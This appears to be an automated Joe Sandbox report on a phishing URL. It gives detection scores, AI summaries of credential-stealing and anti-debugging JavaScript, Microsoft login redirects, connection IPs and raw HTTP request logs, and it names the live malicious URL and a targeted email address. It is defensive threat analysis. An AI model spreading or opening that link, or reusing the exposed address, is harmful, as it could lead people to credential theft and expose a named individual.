Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.com

Overview

General Information

Sample URL:https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.com
Analysis ID:1586435
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
AI detected suspicious Javascript
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory
URL contains potential PII (phishing indication)

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6944 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7128 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1996,i,4207191232076529853,15831843821875857869,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6688 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.com" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.comAvira URL Cloud: detection malicious, Label: malware
Source: https://lap.gnoqwwhpwe.ru/favicon.icoAvira URL Cloud: Label: malware
Source: https://lap.gnoqwwhpwe.ru/3aeK/Avira URL Cloud: Label: malware

Phishing

barindex
Source: 0.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.com... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. It collects user data and sends it to an untrusted domain, and it also attempts to bypass form submission validation. These behaviors are highly indicative of malicious intent, such as phishing or credential theft.
Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.com... This script exhibits several high-risk behaviors, including disabling developer tools, preventing right-click context menus, and redirecting the user to a suspicious domain (login.microsoftonline.com). The use of setInterval with a debugger statement and performance.now() checks suggests an attempt to detect and prevent debugging or analysis of the script. Overall, this script demonstrates malicious intent and should be considered a high-risk threat.
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719926711113592.MGMwZTlkYTAtNjAwOS00MGE2LWI1M2MtMWExYzU4MTEyMTNjZGVmYjRkYmUtM2E2ZC00ODQ4LWIxYjAtNmM0ZTI2ODU2YjY0&ui_locales=en-US&mkt=en-US&client-request-id=4b4b65bb-b1a5-4571-8e7d-4510916c1a9e&state=-rrfQmItooASPaRkkKC0PR8lvbZtx-NhWg_Ulitzr4ibSCiHp8gF5UKmX1o3haf1k5o8l3c3PjQ7nBp1J_adxQ_pnCkluBlhfVcqWxjmJ91kcd9CY4QCahFxRgXcFvy-GukBMlZryuF_0mWeZVP9keorrEjMPAcfGKqxXLy9so2M2B9z5w_a5oYCxMLkgJ4WPgXJylklcvOfVkwhCEkvFrDP0Xf--0WzOxT9CkVZnEHveP-ZMz44QdF93bQRQq_khLbO7bYAConenUcFqV25ow&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719926711113592.MGMwZTlkYTAtNjAwOS00MGE2LWI1M2MtMWExYzU4MTEyMTNjZGVmYjRkYmUtM2E2ZC00ODQ4LWIxYjAtNmM0ZTI2ODU2YjY0&ui_locales=en-US&mkt=en-US&client-request-id=4b4b65bb-b1a5-4571-8e7d-4510916c1a9e&state=-rrfQmItooASPaRkkKC0PR8lvbZtx-NhWg_Ulitzr4ibSCiHp8gF5UKmX1o3haf1k5o8l3c3PjQ7nBp1J_adxQ_pnCkluBlhfVcqWxjmJ91kcd9CY4QCahFxRgXcFvy-GukBMlZryuF_0mWeZVP9keorrEjMPAcfGKqxXLy9so2M2B9z5w_a5oYCxMLkgJ4WPgXJylklcvOfVkwhCEkvFrDP0Xf--0WzOxT9CkVZnEHveP-ZMz44QdF93bQRQq_khLbO7bYAConenUcFqV25ow&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.comHTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="none" viewBox="0 0 26 26"><path fill="#d9d9d9" d="M13 0a13 13 0 1 0 0 26 13 13 0 0 0 0-26m0 24a11 11 0 1 1 0-22 11 11 0 0 1 0 22"/><path fill="#d9d9d9" d="m10.955 16.055-3.95-4.125-1.445...
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719926711113592.MGMwZTlkYTAtNjAwOS00MGE2LWI1M2MtMWExYzU4MTEyMTNjZGVmYjRkYmUtM2E2ZC00ODQ4LWIxYjAtNmM0ZTI2ODU2YjY0&ui_locales=en-US&mkt=en-US&client-request-id=4b4b65bb-b1a5-4571-8e7d-4510916c1a9e&state=-rrfQmItooASPaRkkKC0PR8lvbZtx-NhWg_Ulitzr4ibSCiHp8gF5UKmX1o3haf1k5o8l3c3PjQ7nBp1J_adxQ_pnCkluBlhfVcqWxjmJ91kcd9CY4QCahFxRgXcFvy-GukBMlZryuF_0mWeZVP9keorrEjMPAcfGKqxXLy9so2M2B9z5w_a5oYCxMLkgJ4WPgXJylklcvOfVkwhCEkvFrDP0Xf--0WzOxT9CkVZnEHveP-ZMz44QdF93bQRQq_khLbO7bYAConenUcFqV25ow&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719926711113592.MGMwZTlkYTAtNjAwOS00MGE2LWI1M2MtMWExYzU4MTEyMTNjZGVmYjRkYmUtM2E2ZC00ODQ4LWIxYjAtNmM0ZTI2ODU2YjY0&ui_locales=en-US&mkt=en-US&client-request-id=4b4b65bb-b1a5-4571-8e7d-4510916c1a9e&state=-rrfQmItooASPaRkkKC0PR8lvbZtx-NhWg_Ulitzr4ibSCiHp8gF5UKmX1o3haf1k5o8l3c3PjQ7nBp1J_adxQ_pnCkluBlhfVcqWxjmJ91kcd9CY4QCahFxRgXcFvy-GukBMlZryuF_0mWeZVP9keorrEjMPAcfGKqxXLy9so2M2B9z5w_a5oYCxMLkgJ4WPgXJylklcvOfVkwhCEkvFrDP0Xf--0WzOxT9CkVZnEHveP-ZMz44QdF93bQRQq_khLbO7bYAConenUcFqV25ow&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.comSample URL: PII: Dmestevao@iif.com
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719926711113592.MGMwZTlkYTAtNjAwOS00MGE2LWI1M2MtMWExYzU4MTEyMTNjZGVmYjRkYmUtM2E2ZC00ODQ4LWIxYjAtNmM0ZTI2ODU2YjY0&ui_locales=en-US&mkt=en-US&client-request-id=4b4b65bb-b1a5-4571-8e7d-4510916c1a9e&state=-rrfQmItooASPaRkkKC0PR8lvbZtx-NhWg_Ulitzr4ibSCiHp8gF5UKmX1o3haf1k5o8l3c3PjQ7nBp1J_adxQ_pnCkluBlhfVcqWxjmJ91kcd9CY4QCahFxRgXcFvy-GukBMlZryuF_0mWeZVP9keorrEjMPAcfGKqxXLy9so2M2B9z5w_a5oYCxMLkgJ4WPgXJylklcvOfVkwhCEkvFrDP0Xf--0WzOxT9CkVZnEHveP-ZMz44QdF93bQRQq_khLbO7bYAConenUcFqV25ow&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.comHTTP Parser: No favicon
Source: https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.comHTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719926711113592.MGMwZTlkYTAtNjAwOS00MGE2LWI1M2MtMWExYzU4MTEyMTNjZGVmYjRkYmUtM2E2ZC00ODQ4LWIxYjAtNmM0ZTI2ODU2YjY0&ui_locales=en-US&mkt=en-US&client-request-id=4b4b65bb-b1a5-4571-8e7d-4510916c1a9e&state=-rrfQmItooASPaRkkKC0PR8lvbZtx-NhWg_Ulitzr4ibSCiHp8gF5UKmX1o3haf1k5o8l3c3PjQ7nBp1J_adxQ_pnCkluBlhfVcqWxjmJ91kcd9CY4QCahFxRgXcFvy-GukBMlZryuF_0mWeZVP9keorrEjMPAcfGKqxXLy9so2M2B9z5w_a5oYCxMLkgJ4WPgXJylklcvOfVkwhCEkvFrDP0Xf--0WzOxT9CkVZnEHveP-ZMz44QdF93bQRQq_khLbO7bYAConenUcFqV25ow&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://signup.live.com/signup?sru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1033%26client_id%3d4765445b-32c6-49b0-83e6-1d93765276ca%26mkt%3dEN-US%26opid%3d229863860F0D43B1%26opidt%3d1736395914%26uaid%3d4b4b65bbb1a545718e7d4510916c1a9e%26contextid%3d8C30CD86F17B4666%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=4765445b-32c6-49b0-83e6-1d93765276ca&uaid=4b4b65bbb1a545718e7d4510916c1a9e&suc=4765445b-32c6-49b0-83e6-1d93765276ca&lic=1HTTP Parser: No favicon
Source: https://signup.live.com/signup?sru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1033%26client_id%3d4765445b-32c6-49b0-83e6-1d93765276ca%26mkt%3dEN-US%26opid%3d229863860F0D43B1%26opidt%3d1736395914%26uaid%3d4b4b65bbb1a545718e7d4510916c1a9e%26contextid%3d8C30CD86F17B4666%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=4765445b-32c6-49b0-83e6-1d93765276ca&uaid=4b4b65bbb1a545718e7d4510916c1a9e&suc=4765445b-32c6-49b0-83e6-1d93765276ca&lic=1HTTP Parser: No favicon
Source: https://signup.live.com/signup?sru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1033%26client_id%3d4765445b-32c6-49b0-83e6-1d93765276ca%26mkt%3dEN-US%26opid%3d229863860F0D43B1%26opidt%3d1736395914%26uaid%3d4b4b65bbb1a545718e7d4510916c1a9e%26contextid%3d8C30CD86F17B4666%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=4765445b-32c6-49b0-83e6-1d93765276ca&uaid=4b4b65bbb1a545718e7d4510916c1a9e&suc=4765445b-32c6-49b0-83e6-1d93765276ca&lic=1HTTP Parser: No favicon
Source: https://signup.live.com/signup?sru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1033%26client_id%3d4765445b-32c6-49b0-83e6-1d93765276ca%26mkt%3dEN-US%26opid%3d229863860F0D43B1%26opidt%3d1736395914%26uaid%3d4b4b65bbb1a545718e7d4510916c1a9e%26contextid%3d8C30CD86F17B4666%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=4765445b-32c6-49b0-83e6-1d93765276ca&uaid=4b4b65bbb1a545718e7d4510916c1a9e&suc=4765445b-32c6-49b0-83e6-1d93765276ca&lic=1HTTP Parser: No favicon
Source: https://signup.live.com/signup?sru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1033%26client_id%3d4765445b-32c6-49b0-83e6-1d93765276ca%26mkt%3dEN-US%26opid%3d229863860F0D43B1%26opidt%3d1736395914%26uaid%3d4b4b65bbb1a545718e7d4510916c1a9e%26contextid%3d8C30CD86F17B4666%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=4765445b-32c6-49b0-83e6-1d93765276ca&uaid=4b4b65bbb1a545718e7d4510916c1a9e&suc=4765445b-32c6-49b0-83e6-1d93765276ca&lic=1HTTP Parser: No favicon
Source: https://signup.live.com/signup?sru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1033%26client_id%3d4765445b-32c6-49b0-83e6-1d93765276ca%26mkt%3dEN-US%26opid%3d229863860F0D43B1%26opidt%3d1736395914%26uaid%3d4b4b65bbb1a545718e7d4510916c1a9e%26contextid%3d8C30CD86F17B4666%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=4765445b-32c6-49b0-83e6-1d93765276ca&uaid=4b4b65bbb1a545718e7d4510916c1a9e&suc=4765445b-32c6-49b0-83e6-1d93765276ca&lic=1HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719926711113592.MGMwZTlkYTAtNjAwOS00MGE2LWI1M2MtMWExYzU4MTEyMTNjZGVmYjRkYmUtM2E2ZC00ODQ4LWIxYjAtNmM0ZTI2ODU2YjY0&ui_locales=en-US&mkt=en-US&client-request-id=4b4b65bb-b1a5-4571-8e7d-4510916c1a9e&state=-rrfQmItooASPaRkkKC0PR8lvbZtx-NhWg_Ulitzr4ibSCiHp8gF5UKmX1o3haf1k5o8l3c3PjQ7nBp1J_adxQ_pnCkluBlhfVcqWxjmJ91kcd9CY4QCahFxRgXcFvy-GukBMlZryuF_0mWeZVP9keorrEjMPAcfGKqxXLy9so2M2B9z5w_a5oYCxMLkgJ4WPgXJylklcvOfVkwhCEkvFrDP0Xf--0WzOxT9CkVZnEHveP-ZMz44QdF93bQRQq_khLbO7bYAConenUcFqV25ow&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719926711113592.MGMwZTlkYTAtNjAwOS00MGE2LWI1M2MtMWExYzU4MTEyMTNjZGVmYjRkYmUtM2E2ZC00ODQ4LWIxYjAtNmM0ZTI2ODU2YjY0&ui_locales=en-US&mkt=en-US&client-request-id=4b4b65bb-b1a5-4571-8e7d-4510916c1a9e&state=-rrfQmItooASPaRkkKC0PR8lvbZtx-NhWg_Ulitzr4ibSCiHp8gF5UKmX1o3haf1k5o8l3c3PjQ7nBp1J_adxQ_pnCkluBlhfVcqWxjmJ91kcd9CY4QCahFxRgXcFvy-GukBMlZryuF_0mWeZVP9keorrEjMPAcfGKqxXLy9so2M2B9z5w_a5oYCxMLkgJ4WPgXJylklcvOfVkwhCEkvFrDP0Xf--0WzOxT9CkVZnEHveP-ZMz44QdF93bQRQq_khLbO7bYAConenUcFqV25ow&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719926711113592.MGMwZTlkYTAtNjAwOS00MGE2LWI1M2MtMWExYzU4MTEyMTNjZGVmYjRkYmUtM2E2ZC00ODQ4LWIxYjAtNmM0ZTI2ODU2YjY0&ui_locales=en-US&mkt=en-US&client-request-id=4b4b65bb-b1a5-4571-8e7d-4510916c1a9e&state=-rrfQmItooASPaRkkKC0PR8lvbZtx-NhWg_Ulitzr4ibSCiHp8gF5UKmX1o3haf1k5o8l3c3PjQ7nBp1J_adxQ_pnCkluBlhfVcqWxjmJ91kcd9CY4QCahFxRgXcFvy-GukBMlZryuF_0mWeZVP9keorrEjMPAcfGKqxXLy9so2M2B9z5w_a5oYCxMLkgJ4WPgXJylklcvOfVkwhCEkvFrDP0Xf--0WzOxT9CkVZnEHveP-ZMz44QdF93bQRQq_khLbO7bYAConenUcFqV25ow&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719926711113592.MGMwZTlkYTAtNjAwOS00MGE2LWI1M2MtMWExYzU4MTEyMTNjZGVmYjRkYmUtM2E2ZC00ODQ4LWIxYjAtNmM0ZTI2ODU2YjY0&ui_locales=en-US&mkt=en-US&client-request-id=4b4b65bb-b1a5-4571-8e7d-4510916c1a9e&state=-rrfQmItooASPaRkkKC0PR8lvbZtx-NhWg_Ulitzr4ibSCiHp8gF5UKmX1o3haf1k5o8l3c3PjQ7nBp1J_adxQ_pnCkluBlhfVcqWxjmJ91kcd9CY4QCahFxRgXcFvy-GukBMlZryuF_0mWeZVP9keorrEjMPAcfGKqxXLy9so2M2B9z5w_a5oYCxMLkgJ4WPgXJylklcvOfVkwhCEkvFrDP0Xf--0WzOxT9CkVZnEHveP-ZMz44QdF93bQRQq_khLbO7bYAConenUcFqV25ow&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719926711113592.MGMwZTlkYTAtNjAwOS00MGE2LWI1M2MtMWExYzU4MTEyMTNjZGVmYjRkYmUtM2E2ZC00ODQ4LWIxYjAtNmM0ZTI2ODU2YjY0&ui_locales=en-US&mkt=en-US&client-request-id=4b4b65bb-b1a5-4571-8e7d-4510916c1a9e&state=-rrfQmItooASPaRkkKC0PR8lvbZtx-NhWg_Ulitzr4ibSCiHp8gF5UKmX1o3haf1k5o8l3c3PjQ7nBp1J_adxQ_pnCkluBlhfVcqWxjmJ91kcd9CY4QCahFxRgXcFvy-GukBMlZryuF_0mWeZVP9keorrEjMPAcfGKqxXLy9so2M2B9z5w_a5oYCxMLkgJ4WPgXJylklcvOfVkwhCEkvFrDP0Xf--0WzOxT9CkVZnEHveP-ZMz44QdF93bQRQq_khLbO7bYAConenUcFqV25ow&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719926711113592.MGMwZTlkYTAtNjAwOS00MGE2LWI1M2MtMWExYzU4MTEyMTNjZGVmYjRkYmUtM2E2ZC00ODQ4LWIxYjAtNmM0ZTI2ODU2YjY0&ui_locales=en-US&mkt=en-US&client-request-id=4b4b65bb-b1a5-4571-8e7d-4510916c1a9e&state=-rrfQmItooASPaRkkKC0PR8lvbZtx-NhWg_Ulitzr4ibSCiHp8gF5UKmX1o3haf1k5o8l3c3PjQ7nBp1J_adxQ_pnCkluBlhfVcqWxjmJ91kcd9CY4QCahFxRgXcFvy-GukBMlZryuF_0mWeZVP9keorrEjMPAcfGKqxXLy9so2M2B9z5w_a5oYCxMLkgJ4WPgXJylklcvOfVkwhCEkvFrDP0Xf--0WzOxT9CkVZnEHveP-ZMz44QdF93bQRQq_khLbO7bYAConenUcFqV25ow&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /3aeK/ HTTP/1.1Host: lap.gnoqwwhpwe.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://lap.gnoqwwhpwe.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://lap.gnoqwwhpwe.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://lap.gnoqwwhpwe.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://lap.gnoqwwhpwe.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
